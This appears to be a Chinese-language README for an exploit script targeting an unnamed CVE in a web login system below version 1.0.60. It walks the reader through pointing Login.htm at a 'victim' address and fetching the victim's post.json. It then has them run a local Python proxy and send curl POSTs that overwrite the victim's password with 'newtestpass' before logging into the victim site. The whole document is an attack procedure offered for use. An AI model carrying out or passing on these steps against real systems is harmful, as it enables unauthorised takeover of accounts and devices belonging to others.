打开 Login.htm,并将 IP:PORT 处编辑为目标受害者地址
编辑 var LoginVersion = "Check On The Victim Site"; 部分为受害者页面的版本号,这样你就可以访问受害者页面并查看源代码 警告:此 CVE 仅适用于 1.0.60 之前的版本
从受害者站点下载 post.json 文件(http://victimip:port/post.json) 将其移动到脚本文件夹,你将会得到 3 个文件
现在运行 python 文件并访问 127.0.0.1:8080/login.htm(如果 8080 端口已被占用,你可以用文本编辑器打开脚本并修改最后一部分来更改)
打开登录页面时出现的警报可忽略
打开终端并使用以下 curl 命令,如果输出 "success" 则说明成功。
curl -v -X POST http://localhost:8080/post.json -d "UserPassword0=newtestpass"
curl -v -X POST http://localhost:8080/post.json -d "UsersSaveConfig=true"
要检查页面是否已更改,发送以下命令:
curl http://localhost:8080/check_password
现在,访问受害者网站(不是 localhost 那个)并输入新密码,在此示例中,密码是 "newtestpass"